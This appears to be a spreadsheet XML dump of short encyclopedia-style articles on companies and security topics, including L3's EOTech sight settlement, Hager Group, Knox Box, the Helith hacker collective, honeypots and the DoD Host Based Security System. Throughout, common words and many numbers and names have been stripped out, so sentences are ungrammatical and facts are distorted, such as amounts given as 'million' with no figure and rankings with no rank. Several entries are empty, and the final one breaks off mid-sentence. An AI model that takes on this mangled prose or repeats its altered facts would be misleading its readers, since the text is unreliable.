informal industry communication. december 2016, company changed name communications holdings, inc. technologies, inc. better reflect company's wider focus since founding 1997. company's website changed l-3com.com l3t.com, company's nyse ticker symbol remained same. products provision, millimeter wave airport passenger screening system examiner 3dx, xlb, airport baggage scanning systems optex, trace level explosive detection system avcatt, mobile aviation training simulator orchid, total development simulation environment (power, marine) eotech, holographic weapon sights sonoma electro optical imaging systems, 1508m dragon eyes, 1205md, 2111x, 2514x, 2711g controversies federal contract suspension 2010, announced l3's special support programs division suspended united states force contract work federal government. department defense investigation reportedly found company had, "used highly sensitive government computer network collect competitive business information use." federal criminal investigation ended temporary suspension july 2010. counterfeit parts november 2010, issued part purge notification prevent future chinese counterfeit parts, notify customers whose display systems suffered much higher expected failure rates. eotech defective holographic sights lawsuit 2015, technologies agreed $25.6 million settle lawsuit u.s. government. accused knowingly providing u.s. military optics failed extreme temperatures humid weather conditions. these sights provided infantry special operations forces operating afghanistan iraq, well civilians enforcement.the civil fraud lawsuit filed preet bharara, southern district york. lawsuit alleged officials known since 2006 holographic sights sent iraq afghanistan failed perform advertised extreme temperature ranges. lawsuit alleges independently discovered thermal drift defect, point-of-aim would shift sights exposed temperature extremes, march 2015 presented eotech "the findings company documented internally years. shortly thereafter, eotech finally disclosed thermal drift defect dod." according court documents, eotech advertised sights performed temperatures ranging degrees degrees fahrenheit, humid conditions. also contractors u.s. federal government references external links official website murdo morrison (july 2018). "farnborough: rolls commercial aviation branding". flightglobal.</t>
  </si>
  <si>
    <t>Hager Group</t>
  </si>
  <si>
    <t>hager group manufacturer electrical installations residential, commercial industrial buildings based blieskastel, germany. company family-run owned ever since foundation 1955.hager group provides products services ranging energy distribution cable management intelligent building automation security systems, brand hager. hager group also owns brands berker, bocchiotti, daitem, diagral, elcom e3/dc. 2018, hager group world market leader electrical installation systems. august 2019, group ranked number family-owned businesses germany according magazine deutsche wirtschaft. history 1955, hager ohg, elektrotechnische fabrik founded brothers oswald hermann hager, together father peter hager ensheim saarland region germany. since 1945, saarland economic control france access german market. however, hager wanted gain foothold markets. 1959, hager brothers founded first foreign subsidiary, hager electro obernai, alsace, north-eastern france.in 1966, hager began systematical training electricians, whose expertise created culture customer loyalty, something continues day. hager’s modular rotary fuse carrier patented germany 1968 france 1970. time, first mass-produced distribution board, hager-rapid-system, launched french market. 1973, hager achieved sales million deutsche marks germany 1974 company reached turnover million francs france. 1976, hager launched mini gamma enclosure, 1982 company started producing first residual-current circuit breakers (rccb) germany. production facility high-bay warehouse opened blieskastel. hager group began market complete service provider electrical installations buildings 1980s, setting sales companies europe (switzerland great britain). mid-1990s, hager distribution channels united arab emirates (dubai), singapore, malaysia, hong kong, china, australia zealand. 2007, hager group became european company: hager locations hager group manufacturing sites countries across world. components respective markets manufactured local production facilities order accommodate local installation requirements. biggest production site obernai, france. hager forum established 2015 training meeting place partners, customers employees company. acquisitions 1992, group acquired lumetal, manufacturer distribution boards porcia, italy. hager group acquired german company tehalit 1996, manufacturer cable management systems cable ducts.in 1998, group acquired french electronic timer manufacturer flash, whose registered office saverne. prior this, hager group manufactured mechanical timers. year, company also acquired british manufacturer ashley rock ulverston, whose products manufactured according british standards. 2002, polish company polo, whose registered office tychy, integrated company, 2004, hager group acquired swiss company weber french manufacturer atral. addition hager brand security systems, atral also manufactures products brands diagral, daitem logisty. 2006, hager entered brazilian market acquired shares eletromar. hager group opened plant pune, india 2008 september year, foundation stone eletromar production site brazil laid. january 2009, hager acquired electraplan solutions gmbh, 2010, hager acquired berker, german manufacturer switches, whose registered offices schalksmühle ottfingen.2012 hager gained german family firm elcom, producer intercoms.in 2018, acquired e3/dc gmbh, german developer inverters energy storage systems. brands products hager brand offers services electrical installations residential, commercial industrial buildings. 2009, previous brands tehalit, weber, lume, klik, flash, polo, ashley rock logisty combined hager brand. alarms security systems sold daitem diagral. berker manufactures switches switch systems part hager group. bocchiotti/iboco, italian market leader cable management room distribution systems, also part hager group whilst elcom produces intercom systems residential office buildings.there four different areas application hager group’s products services: energy distribution metering systems, including energy management concepts electrical installation cable management systems power data distribution switch ranges building control security systemssince 2018, hager group working electromobility audi collaboration connect audi e-tron model hager group’s home energy management system (hems). corporate culture sales invested research development. 2019, company filed around 3,000 patents. group employs around people research development, mainly focuses electromobility, intelligent building technology (for smart homes) energy efficiency. between october 2010 june 2014, hager group sponsored football club saarbrücken, focus promoting young talent. since 2017, group supporting french football club racing club strasbourg alsace. this sponsorship lasts three years. references</t>
  </si>
  <si>
    <t>Security First Corp</t>
  </si>
  <si>
    <t>security first corp rancho santa margarita, information assurance data security company. company held patents software defined data security, including secure parser extended (spx) technology, encrypts randomly splits data multiple segments, storing different locations. this technology also called bitsplitting.the company declared bankruptcy 2020, sold capital. history security first corp founded 2002 mark o'hare, 26-year navy veteran served program executive officer navy aircraft carrier program.in 2008, information technology company unisys integrated security first's secure parser technology stealth brand software windows servers desktops.in june 2009, company acquired silicon valley-based computer corporation (drc), developer acceleration coprocessors. security first reportedly using drc's products information security appliance, planned operate wholly owned subsidiary.in august 2011, announced integrating three security first's cryptographic technologies next generation chips, increase security.in december 2014, security first released spxsharc vmware's vcenter server, running vmware's esxi hypervisor.in 2015, announced using security first's spxbitfiler-ips encryption technology allow ibm's pureapplication system virtual pattern deployers encrypt on-disk data. technology also licensed cloud data encryption service (icdes).the company declared bankruptcy 2020, sold capital. products security first's core product secure parser extended (spx) technology, encrypted data, scrambled randomly dispersed different locations. technology combined aes-256 certified encryption, multi-factor secret sharing keyed information dispersal, cryptographic random bit-splitting. solution compliant common government industry data protection standards security requirements.the company developed sharc, security suite designed multi-site data protection, gateway, data protection solution designed protect data stored across multiple cloud computing service providers, process company calls "cloud spanning", parsedcloud, file transfer application encrypts, splits transfers data multiple sites, available free fee-based versions. media coverage december 2014, former apple john sculley interviewed news called security first's bitsplitting technology "gamechanger". funding december 2014 filing, company announced raised million sales debt equity, undisclosed investors. april 2016 filing, company announced raised additional million sales debt equity, also undisclosed investors. subsidiaries company operated computer corporation wholly owned subsidiary. references external links official website</t>
  </si>
  <si>
    <t>Knox Box</t>
  </si>
  <si>
    <t>knox small, wall-mounted safe holds building keys fire departments, emergency medical services, sometimes police retrieve emergency situations. term "knox-box" brand name products produced american company knox associates, business knox company. knox part line security-related products marketed knox rapid access system.local fire departments hold master keys knox boxes response area, enabling quickly enter buildings area without force entry find individual keys held deposit station. sometimes knox master stored retention device sentralok keysecure. knox master retention devices provide accountability access key. keysecure records audit trail accessed sentralok requires dispatcher release dtmf tones. both sentralok keysecure also branded products knox company. knox also fire losses building owners since firefighters enter buildings without breaking doors windows. also reduce potential firefighter injured forcing entry. disadvantage system provides single point failure security many buildings. district's knox stolen copied, thief enter building area knox box. knox commercial boxes standard tamper switch wired building's fire alarm control panel sound supervisory alert opened. keys knox keysecure throughout district (the extent depends district). february 2013 conference, researcher publicized possible exploit, claiming successfully ordered box, disassembled used information disassembling lock cylinder create master key. also real-estate lock device similar purpose used real estate agents references external links knox company website</t>
  </si>
  <si>
    <t>Helith</t>
  </si>
  <si>
    <t>helith network "helith") hacker collective active since 1999 globally spread community. suspected helith affiliated specialists field malware network security. name origin name came accident german word helith means "heroes". chosen group beliefs nobody cares poor chances like studied hackers. also chosen point members ready even conflicts laws civil restrictions like beliefs ethics. origin name traced fact "helith" founded germany thus accident german chosen group name. some founding members helith shared belief talked chaos communication congress congress 1998-1999 germany improved round table conference needs done reach goal. conference rembrandt chosen public link helith thus making poster child victim federal forces. known member "helith" many members exist detail information public rembrandt problematic character like theo raadt. history helith founded 1998-1999 berlin area location members share information without judging anybody make living work. their computer hardware work various projects like john ripper (partly sse2 code, porting openbsd), metasploit, medusa, hydra nmap. time, members "helith" released several security advisories affecting even secure opensource operating system openbsd, firewall, openssh, netbsd vendors like netgear nortel. july 2007, washington post reporter brian krebs wrote article partly "helith" cracking deutsche bank internal network. global links helith reach least germany founded, russia, romania, columbia, several african countries usa. members helith network membership varied included various times: benkei, concode, cyneox, rembrandt, rott_en, noptrix, skyout, zarathua members might active disclosed. list created research google visiting helith-website. external links washington post article current helith website exploitdb posted advisory helith netbsd security advisory exploitdb posted advisory helith common wimax router</t>
  </si>
  <si>
    <t>Site Security Handbook</t>
  </si>
  <si>
    <t>site security handbook, 2196, guide setting computer security policies procedures sites systems internet (however, information provided also useful sites connected internet). guide lists issues factors site must consider setting policies. makes number recommendations provides discussions relevant areas. this guide framework setting security policies procedures. order effective policies procedures, site make many decisions, gain agreement, communicate implement policies. guide product ietf working group, published 1997, obsoleting earlier 1244 1991. also 2504 users' security handbook references 2196 site security handbook</t>
  </si>
  <si>
    <t>HitDynamics</t>
  </si>
  <si>
    <t>hitdynamics provider analytics software allowing website owners track traffic sites ascertain traffic sources deliver conversions sales. company founded internet entrepreneur polyakov january 2005, acquired march 2006 hitwise. company's technology exists analytics hitwise suite. also cupid plc, also founded polyakov references</t>
  </si>
  <si>
    <t>Hitbox (web analytics)</t>
  </si>
  <si>
    <t>hitbox popular counter analytics product created websidestory, taken omniture (subsequently taken adobe), originally adult entertainment websites. widely used commercial organizations across variety industrial sectors complete integrated metrics solution monitoring traffic driving marketing. adobe plans completely phase moving clients flagship product, sitecatalyst.companies place javascript files servers linked html script page code. combination makes request data collection servers page viewed user. cookie placed users computer contains unique this unique passed request data collection servers. during processing data hitbox ties together page views perspective user moved site. other, custom information passed request well information http header browser, referrer browser details. some analytics services declared spyware several anti-spyware organizations. references "hitbox.com". archived original 1999-03-02. retrieved 2011-12-12. "hitbox tracks your site traffic--free". pcworld. 1999-04-03. archived original 2011-11-27. retrieved 2011-12-12.</t>
  </si>
  <si>
    <t>Security and Privacy in Computer Systems</t>
  </si>
  <si>
    <t>security privacy computer systems paper willis ware first presented public 1967 spring joint computer conference. significance ware's presentation first public conference session information security privacy respect computer systems, especially networked remotely-accessed ones.the ieee annals history computing said ware's 1967 spring joint computer conference session, together 1970's ware report, marked start field computer security. external links official website references</t>
  </si>
  <si>
    <t>Hitman network</t>
  </si>
  <si>
    <t>Singularity (software)</t>
  </si>
  <si>
    <t>singularity free open-source computer program performs operating-system-level virtualization also known containerization.one main uses singularity bring containers reproducibility scientific computing high-performance computing (hpc) world.the need reproducibility requires ability containers move applications system system.using singularity containers, developers work reproducible environments choosing design, complete environments easily copied executed platforms.in 2021 singularity open source project split projects called apptainer singularityce. history singularity began open-source project 2015, team researchers lawrence berkeley national laboratory, gregory kurtzer, developed initial version written programming language released license.by 2016, many developers different research facilities joined forces team lawrence berkeley national laboratory development singularity.singularity quickly attracted attention computing-heavy scientific institutions worldwide: stanford university research computing center deployed singularity xstream sherlock clusters national institutes health installed singularity biowulf, 95,000+ core/30 linux cluster various sites open science grid consortium including fermilab started adopting singularity; april 2017, singularity deployed open science grid network.for years row, 2016 2017, singularity recognized hpcwire editors "one five technologies watch". 2017 singularity also first place category "best programming tool technology".as 2018, based data entered voluntary basis public registry, singularity user base estimated greater 25,000 installations included users academic institutions ohio state university michigan state university, well centers like texas advanced computing center, diego supercomputer center, ridge national laboratory. february 2018 sylabs company, founded singularity author, announced provide commercial support singularity. october year sylabs released version 3.0.0 rewrite programming language. 2020 gregory kurtzer left sylabs retained leadership singularity open source project. 2021 sylabs made fork project called singularityce. november 2021 singularity open source project joined linux foundation renamed apptainer. features singularity able support natively high-performance interconnects, infiniband intel omni-path architecture (opa).similar support infiniband intel devices, singularity support pcie-attached device within compute node, graphic accelerators.singularity also native support open library utilizing hybrid container approach openmpi exists inside outside container.these features make singularity increasingly useful areas machine learning, deep learning data-intensive workloads applications benefit high bandwidth latency characteristics technologies. integration systems traditionally already resource management scheduling systems place, container runtime environments must integrated existing system resource manager. using enterprise container solutions like docker systems would require modifications software. docker containers automatically converted stand-alone singularity files submitted resource managers.singularity seamlessly integrates many resource managers including: htcondor oracle grid engine (sge) slurm (simple linux utility resource management) torque (terascale open-source resource queue manager) (pbs professional) hashicorp nomad simple flexible workload orchestrator) also grid computing overlayfs top500 references further reading proceedings 10th international conference utility cloud computing: singularity-based container technology ready running applications clouds? singularity prepares version 3.0, nears million containers served daily dell hpc: containerizing applications singularity intel developer conference 2017: introduction high-performance computing containers singularity hpcwire reveals winners 2017 readers’ editors’ choice awards sc17 conference denver: singularity awarded best programming tool technology category external links official website</t>
  </si>
  <si>
    <t>Homebrew Computer Club</t>
  </si>
  <si>
    <t>homebrew computer club early computer hobbyist group menlo park, california, march 1975 december 1986. club influential role development microcomputer revolution rise aspect silicon valley information technology industrial complex. several high-profile hackers computer entrepreneurs emerged ranks, including steve jobs steve wozniak, founders apple computer. with newsletter monthly meetings promoting open exchange ideas, club described "the crucible entire industry" pertains personal computing. history homebrew computer club informal group electronic enthusiasts technically minded hobbyists gathered trade parts, circuits, information pertaining construction personal computing devices. started gordon french fred moore community computer center menlo park. they interested maintaining regular, open forum people together work making computers accessible everyone.the first meeting club held march 1975, french's garage menlo park, mateo county, california, occasion arrival area first micro instrumentation telemetry systems (mits) altair 8800 microcomputer, unit sent review people's computer company. steve wozniak credits first meeting inspiration design apple next meetings held large home atherton, california, used preschool. subsequent meetings held auditorium stanford linear accelerator center (slac), 1978, meetings moved stanford medical school.an anecdote member thomas "todd" fischer relates more-or-less "formal" meetings participants often reconvened informal, late night "swap meet" parking safeway store road, slac campus rules prohibited activity campus property. others, suggestion roger melen, convened oasis, grill considered located camino real nearby menlo park, recalled years later member "homebrew's staging area". steven levy wrote oasis gatherings: piling wooden booths tables deeply etched initials generations stanford students, garland melen marsh felsenstein dompier french whoever else felt like showing would emboldened meeting's energy pitchers beer. 1999 made-for-television movie pirates silicon valley (and book based, fire valley: making personal computer) describes role homebrew computer club played creating first personal computers, although movie took liberty placing meeting berkeley misrepresented meeting process.many original members homebrew computer club continue meet 2009), formed 6800 club, named motorola (now freescale) 6800 microprocessor. occasionally variously renamed release 6800, 6809, microprocessors, group continues meet monthly cupertino, california. members most members hobbyists electronic engineering computer programming background. they came meetings talk altair 8800, review technical topics, exchange schematics programming tips.from ranks club came founders many microcomputer companies, including steve wozniak steve jobs (apple computer), harry garland roger melen (cromemco), thomas "todd" fischer (imsai division, fischer-freitas company), george morrow (morrow designs), paul terrell (byte shop), adam osborne (osborne computer), marsh (processor technology). john draper also member club, jerry lawson (creator first cartridge-based video game system, fairchild channel li-chen wang, developer palo alto tiny basic graphics software cromemco dazzler, also club member, felsenstein moderator club meetings. steve inness primary designer early cell phone touch screens well business partner john draper. liza loop also early member first woman join.others went pursuits, werthimer researcher search extraterrestrial intelligence. newsletter homebrew computer club's newsletter influential forces formation culture silicon valley. created edited members, initiated idea personal computer, helped members build original computers, like altair. influential event publication bill gates's "open letter hobbyists", lambasted early hackers time violating copyrights commercial software programs.paul terrell, partner repco exclusive sales company mits northern california, member club would provide information meetings progress altair 8800 factory provide copies mits newsletter members. later started byte shop, affordable computer store mountain view, california, bought first apple computers steve jobs steve wozniak demonstration apple meeting slac.the first issue newsletter published march 1975, continued several designs, ending issues december 1977. newsletter published variety addresses early days, later submissions went p.o. address mountain view, california.the second volume began january 1976, included sections letter from mits, cassette update, tiny basic, meeting facilities, software, problems, meeting-1, altair 680. popular culture club depicted films pirates silicon valley (1999) jobs (2013), well documentary series triumph nerds (1996). however depiction club worked entirely accurate. also adam osborne berkeley macintosh user group boston computer society chaos computer club, large influential german club computer history museum dobb's journal hackers: heroes computer revolution hobby computer club kilobaud microcomputing west coast computer faire references external links steve wozniak's home page netherlands home computer club website dutch) homebrew computer club newsletters homebrew computer club newsletters searchable pdfs life outside mainframe: remembering fred moore search valley, 2006 documentary silicon valley includes section homebrew computer club interviews felsenstein steve wozniak. homebrew computer club jolitz heritage site felsenstein homebrew computer club, history free hardware design beginning apple corps dallas (january 1978) thru eyes founding member homebrew computer club 2013 reunion</t>
  </si>
  <si>
    <t>Kitchen Budapest</t>
  </si>
  <si>
    <t>kitchen budapest (kibu) innovation based budapest, hungary. founded 2007 group media artists, theoreticians coders. sponsored magyar telekom. founding members include adam somlai-fischer, peter halacsy, robin nagy, attila nemes, eszter bircsák instigate digital literacy techniques. kibu incorporates three functions including research development (prototyping, testing, service design, ux/ui design), education (next generation programs talent lift) industry collaboration. kibu connects corporate demands creative supplies, theoretic bias academic education tools maker culture, talented young people professional support, global innovation situated, everyday use. kibu worked within network media labs bears established contacts local universities. kibu place ideas come alive. material instantiations great ideas first steps making: hour hackathons, pressure cooking sessions test methodologies, concepts, objects, services. kibu well-equipped workshop area enable wide-ranging projects manufactured, programmed constructed printers strong server parks high fidelity renders. prototypes publicized demo day, biannual showcase event. associated people alumni adam somlai-fischer, co-founder prezi peter halacsy, prezi david lakatos, co-founder sold. györgy péter, media theorist nemes attila, historian, curator bujdosó attila, architect bircsák eszter sipos melinda sources submap urbancyclr, visual simplexity, entwickler.press, 2013, isbn 978-3-86802-099-1, 195. touch code [1], touch code, gestalten, 2011, isbn 978-3-89955-331-4, 60-61, 224-225. musiques cultures digitales [2], march–april–may 2011, isbn 978-2-9529872-1-9 issn 1638-3400, 76-77. science parks boutique labs businessweek, june 2009 about kitchen budapest external links kitchen budapest's website érezni tanulnak mikrochipek végül csak megjött mesterséges intelligencia, állásunkat kéri anthropomorphic scaffold gimiben keresik it-sokat géppel társalogni emberlétről minden városnak kell végre budapesten beindulnak szupererők pasidhoz/csajodhoz belga díjat kapott magyarország szubjektív atlasza “what kind robbers?..” council sound, lights, robots invade london’s kinetica fair wired, february 2010 something’s cooking kitchen budapest noweurope, december 2009 kitchen budapest (lift09 experience artists presentation) lift conference, january 2009 labtolab project</t>
  </si>
  <si>
    <t>Homeland Open Security Technology</t>
  </si>
  <si>
    <t>homeland open security technology (host) five-year, million program department homeland security's science technology directorate promote creation open security open-source software united states government military, especially areas pertaining computer security.proponent david wheeler claims open-source security could also extend hardware written documents. october 2011, project open source america 2011 government deployment open source award. participants project contracted open technology research consortium consists georgia tech research institute (primary), center agile technology university texas austin, open source software institute, open information security foundation. project contributed funding towards openssl software foundation open information security foundation. events october 2012, host hosted open cybersecurity summit washington, d.c.; one-day summit keynote stewart baker, former assistant secretary policy department homeland security. investments suricata open source-based intrusion detection system (ids). developed open information security foundation (oisf). beta version released december 2009, first standard release following july 2010. openssl fips 140-2 validation federal information processing standard (fips) publication 140-2, fips 140-2, u.s. government computer security standard used accredit cryptographic modules. title security requirements cryptographic modules. initial publication 2001 last updated december 2002. references external links homeland open security technology (host) open information security foundation (oisf)</t>
  </si>
  <si>
    <t>Honeyd</t>
  </si>
  <si>
    <t>honeyd open source computer program created niels provos allows user multiple virtual hosts computer network. these virtual hosts configured mimic several different types servers, allowing user simulate infinite number computer network configurations. honeyd primarily used field computer security. primary applications distraction honeyd used primarily purposes. using software's ability mimic many different network hosts 65536 hosts once), honeyd distraction potential hackers. network real servers, server running honeyd, network appear running hundreds servers hacker. hacker research (possibly social engineering) order determine servers real, hacker caught honeypot. either way, hacker slowed possibly caught. honeypot honeyd gets name ability used honeypot. network, normal traffic valid servers only. thus, network administrator running honeyd monitor his/her logs traffic going virtual hosts honeyd. traffic going virtual servers considered highly suspicious. network administrator take preventative action, perhaps blocking suspicious address monitoring network suspicious traffic. external links official website "deploying honeypots honeyd"</t>
  </si>
  <si>
    <t>Honeynet Project</t>
  </si>
  <si>
    <t>honeynet project international security research organization, "dedicated investigating latest attacks, developing open source security tools improve internet security learning hackers behave". history honeynet project began 1999 small mailing list group people.over time, group expanded officially dubbed honeynet project june 2000.the project includes dozens active chapters around world, including brazil, indonesia, greece, india, mexico, iran, australia, ireland, many united states. project goals honeynet project focuses three primary goals: raise awareness existing threats internet. conduct research covering data analysis approaches, unique security tool development, gathering data attackers malicious software use. provide tools techniques used honeynet project organizations benefit. research development honeynet project volunteers collaborate security research efforts covering data analysis approaches, unique security tool development, gathering data attackers malicious software use. project research provides critical additional information, motives attacking, communicate, attack systems, actions compromising system. such information provided know your enemy whitepapers, project blog posts, scan month forensic challenges.the project uses normal computers, without known vulnerabilities, monitors network attacks. also cyber security honeypot (computing) references external links honeynet project home page honeynet project blog</t>
  </si>
  <si>
    <t>Honeypot (computing)</t>
  </si>
  <si>
    <t>computer terminology, honeypot computer security mechanism detect, deflect, manner, counteract attempts unauthorized information systems. generally, honeypot consists data (for example, network site) appears legitimate part site contains information resources value attackers. actually isolated, monitored, capable blocking analyzing attackers. this similar police sting operations, colloquially known "baiting" suspect. types honeypots classified based deployment (use/action) based level involvement. based deployment, honeypots classified production honeypots research honeypotsproduction honeypots easy use, capture limited information, used primarily corporations. production honeypots placed inside production network production servers organization improve overall state security. normally, production honeypots low-interaction honeypots, easier deploy. they give less information attacks attackers research honeypots.research honeypots gather information motives tactics black community targeting different networks. these honeypots direct value specific organization; instead, used research threats organizations face learn better protect threats. research honeypots complex deploy maintain, capture extensive information, used primarily research, military, government organizations.based design criteria, honeypots classified pure honeypots high-interaction honeypots low-interaction honeypotspure honeypots full-fledged production systems. activities attacker monitored using installed honeypot's link network. software needs installed. even though pure honeypot useful, stealthiness defense mechanisms ensured controlled mechanism. high-interaction honeypots imitate activities production systems host variety services and, therefore, attacker allowed services waste time. employing virtual machines, multiple honeypots hosted single physical machine. therefore, even honeypot compromised, restored quickly. general, high-interaction honeypots provide security difficult detect, expensive maintain. virtual machines available, physical computer must maintained honeypot, exorbitantly expensive. example: honeynet. low-interaction honeypots simulate services frequently requested attackers. since consume relatively resources, multiple virtual machines easily hosted physical system, virtual systems short response time, less code required, reducing complexity virtual system's security. example: honeyd. sugarcane type honeypot masquerades open proxy. often take form server designed look like misconfigured http proxy. probably famous open proxy default configuration sendmail (before version 8.9.0 1998) would forward email destination. deception technology recently, market segment called deception technology emerged using basic honeypot technology addition advanced automation scale. deception technology addresses automated deployment honeypot resources large commercial enterprise government institution. malware honeypots malware honeypots used detect malware exploiting known replication attack vectors malware. replication vectors flash drives easily verified evidence modifications, either manual means utilizing special-purpose honeypots emulate drives. spam versions spammers abuse vulnerable resources open mail relays open proxies. these servers accept e-mail anyone internet—including spammers—and send destination. some system administrators created honeypot programs masquerade abusable resources discover spammer activity. there several capabilities honeypots provide administrators, existence fake abusable systems makes abuse difficult risky. honeypots powerful countermeasure abuse rely high volume abuse (e.g., spammers). these honeypots reveal abuser's address provide bulk spam capture (which enables operators determine spammers' urls response mechanisms). described edwards itpro today: typically, spammers test mail server open relaying simply sending email message. spammer receives email message, mail server obviously allows open relaying. honeypot operators, however, relay test thwart spammers. honeypot catches relay test email message, returns test email message, subsequently blocks email messages spammer. spammers continue antispam honeypot spamming, spam never delivered. meanwhile, honeypot operator notify spammers' isps internet accounts canceled. honeypot operators detect spammers open-proxy servers, also notify proxy server operator lock server prevent misuse. apparent source another abused system. spammers abusers chain abused systems make detection original starting point abuse traffic difficult. this indicative power honeypots anti-spam tools. early days anti-spam honeypots, spammers, little concern hiding location, felt safe testing vulnerabilities sending spam directly systems. honeypots made abuse riskier difficult. spam still flows open relays, volume much smaller 2001-02. while spam originates u.s., spammers open relays across political boundaries mask origin. honeypot operators intercepted relay tests recognize thwart attempts relay spam honeypots. "thwart" mean "accept relay spam decline deliver it." honeypot operators discover details concerning spam spammer examining captured spam messages. open relay honeypots include jackpot, written java jack cleaver; smtpot.py, written python karl krueger; spamhole, written bubblegum proxypot open source honeypot "proxypot"). email trap email address used purpose receive spam also considered spam honeypot. compared term "spamtrap", term "honeypot" might suitable systems techniques used detect counterattack probes. with spamtrap, spam arrives destination "legitimately"—exactly non-spam email would arrive. amalgam techniques project honey pot, distributed, open source project uses honeypot pages installed websites around world. these honeypot pages disseminate uniquely tagged spamtrap email addresses spammers tracked—the corresponding spam mail subsequently sent spamtrap e-mail addresses. database honeypot databases often attacked intruders using injection. activities recognized basic firewalls, companies often database firewalls protection. some available database firewalls provide/support honeypot architectures intruder runs trap database application remains functional. honeypot detection just honeypots weapons spammers, honeypot detection systems spammer-employed counter-weapons. detection systems would likely unique characteristics specific honeypots identify them, property-value pairs default honeypot configuration, many honeypots in-use utilise unique characteristics larger daunting seeking detect thereby identify them. this unusual circumstance software; situation "versionitis" large number versions software, differing slightly other) beneficial. there's also advantage easy-to-detect honeypots deployed. fred cohen, inventor deception toolkit, argues every system running honeypot deception port adversaries detect honeypot. cohen believes might deter adversaries. risks goal honeypots attract engage attackers sufficiently long period obtain high-level indicators compromise (ioc) attack tools tactics, techniques, procedures (ttps). thus, honeypot needs emulate essential services production network grant attacker freedom perform adversarial activities increase attractiveness attacker. although honeypot controlled environment monitored using tools honeywall, attackers still able honeypots pivot nodes penetrate production systems.the second risk honeypots attract legitimate users lack communication large-scale enterprise networks. example, security team applies monitors honeypot disclose honeypot location users time lack communication prevention insider threats. honey nets honeypots network form honey net. typically, honey used monitoring larger and/or diverse network honeypot sufficient. honey nets honeypots usually implemented parts larger network intrusion detection systems. honey farm centralized collection honeypots analysis tools.the concept honey first began 1999 lance spitzner, founder honeynet project, published paper build honeypot". history earliest honeypot techniques described clifford stoll's 1989 book cuckoo's egg. earliest documented cases cybersecurity honeypot began january 1991. january 1991 worked at&amp;t bell laboratories cheswick observed criminal hacker, known cracker, attempting obtain copy password file. cheswick wrote colleagues constructed "chroot "jail" "roach motel")" allowed observe attacker period several months. 2017, dutch police used honeypot techniques track users darknet market hansa. metaphor bear attracted stealing honey common many traditions, including germanic, celtic, slavic. common slavic word bear medved "honey eater". tradition bears stealing honey passed stories folklore, especially well known winnie pooh. also canary trap client honeypot cowrie defense strategy (computing) honeymonkey honeytoken network telescope operation trust tarpit references notes further reading lance spitzner (2002). honeypots tracking hackers. addison-wesley. isbn 0-321-10895-7. sean bodmer; kilger; gregory carpenter; jade jones (2012). reverse deception: organized cyber threat counter-exploitation. mcgraw-hill education. isbn 978-0-07-177249-5. external links ultimate fake access point less clear-text wpa2 passphrase hacking distributed open proxy honeypots project: wasc sans institute: what honey pot? sans institute: fundamental honeypotting project honeypot curated list honeypots, tools components focused open source projects</t>
  </si>
  <si>
    <t>Single sign-on</t>
  </si>
  <si>
    <t>Security as a service</t>
  </si>
  <si>
    <t>security service (secaas) business model service provider integrates security services corporate infrastructure subscription basis cost-effectively individuals corporations provide total cost ownership considered. secaas inspired "software service" model applied information security type services require on-premises hardware, avoiding substantial capital outlays. these security services often include authentication, anti-virus, anti-malware/spyware, intrusion detection, penetration testing security event management, among others.outsourced security licensing delivery boasting multibillion-dollar market. secaas provides users internet security services providing protection online threats attacks ddos constantly searching access points compromise websites. demand cloud computing skyrockets, users vulnerable attacks accessing internet access points. secaas serves buffer persistent online threats. categories secaas cloud security alliance (csa) organization dedicated defining raising awareness secure cloud computing. defined following categories secaas tools created series technical implementation guidance documents help businesses implement understand secaas. these categories include: business continuity disaster recovery (bcdr bc/dr) continuous monitoring data loss prevention (dlp) email security encryption identity access management (iam) intrusion management network security security assessment penetration testing security information event management (siem) vulnerability scanning security secaas models secaas typically offered several forms: subscription payment utilized services freeware, some features free additions pay: examples include aws, nmap.online, cloud free charge: examples include cloudbric, cloudflare, incapsula. benefits security service offers number benefits, including: cost-cutting: secaas eases financial constraints burdens online businesses, integrating security services without on-premises hardware huge budget. using cloud-based security product also bypasses need costly security experts analysts. consistent uniform protection:secaas services provide continued protection databases constantly updated provide up-to-date security coverage. also alleviates issue separate infrastructures, instead combining elements manageable system. constant virus definition updates reliant user compliance greater security expertise typically available within organization faster user provisioning outsourcing administrative tasks, management, save time money allow organization devote time core competencies interface allows in-house administration tasks well view security environment ongoing activities challenges secaas number deficiencies make insecure many applications. each individual security service request adds least across-the-'net round-trip (not counting installer packages), four opportunities hacker intercept conversation: send connection point going receive connection point going sending point return; receiving point return.secaas makes security handling uniform security breach request, security broken requests, broadest attack surface also multiplies rewards incentive hacker value gained effort dramatically increased. both factors especially tailored resources nation/state-sponsored hacker. biggest challenge secaas market maintaining reputation reliability superiority standard non-cloud services. secaas whole seemingly become mainstay cloud market.cloud-based website security cater businesses, specific requirements must properly assessed individual needs. business cater consumers cannot afford keep data loose vulnerable hacker attacks. heaviest part secaas educating businesses. since data biggest asset businesses, cios ctos take care overall security company. also application security managed security service cloud computing references external links security service working group</t>
  </si>
  <si>
    <t>Host Based Security System</t>
  </si>
  <si>
    <t>host based security system (hbss) official name given united states department defense (dod) commercial off-the-shelf (cots) suite software applications used within monitor, detect, defend computer networks systems. enterprise-wide information assurance computer network defense solutions steering group (essg) sponsored acquisition hbss system within enterprise network. hbss deployed non-classified internet protocol routed network (niprnet) secret internet protocol routed network (siprnet) networks, priority given installing niprnet. hbss based mcafee, inc's epolicy orchestrator (epo) mcafee point product security applications host intrusion prevention system (hips). history seeing need supply comprehensive, department-wide security suite tools system administrators, essg started gather requirements formation host-based security system summer 2005. march 2006, systems mcafee awarded contract supply automated host-based security system department. after award, pilot sites identified receive first deployments hbss. during pilot roll out, system administrators around world identified trained using hbss software preparation software deployment across dod. october 2007, joint task force global network operations (jtf-gno) released communications tasking order (cto) 07-12 (deployment host based security system (hbss)) mandating deployment hbss combatant command, service agency (cc/s/a) networks within completion date quarter 2008. release brought hbss attention major department heads cc/s/a's, providing essg necessary authority enforce deployment. agencies willing comply risked disconnected global information grid (gig) lack compliance. lessons learned pilot deployments provided valuable insight hbss program, eventually leading defense information systems agency (disa) supplying pre-loaded hbss hardware well providing hbss software image could loaded compliant hardware platforms. this proved invaluable easing deployment task newly trained hbss system administrators provided consistent department-wide software baseline. disa provided step-by-step documentation completing hbss baseline creation freshly installed operating system. lessons learned niprnet deployments simplified process deploying hbss siprnet. significant hbss dates summer 2005: essg gathered information establishing hbss automated system march 2006: systems mcafee awarded contract hbss establishment deployment march 2007: essg approved hbss full-scale deployment throughout enterprise october 2007: jtf-gno releases 07-12 november, 2009: force awarded northrop grumman deployment hbss siprnet hbss components throughout lifetime, hbss undergone several major baseline updates well minor maintenance releases. first major release hbss known 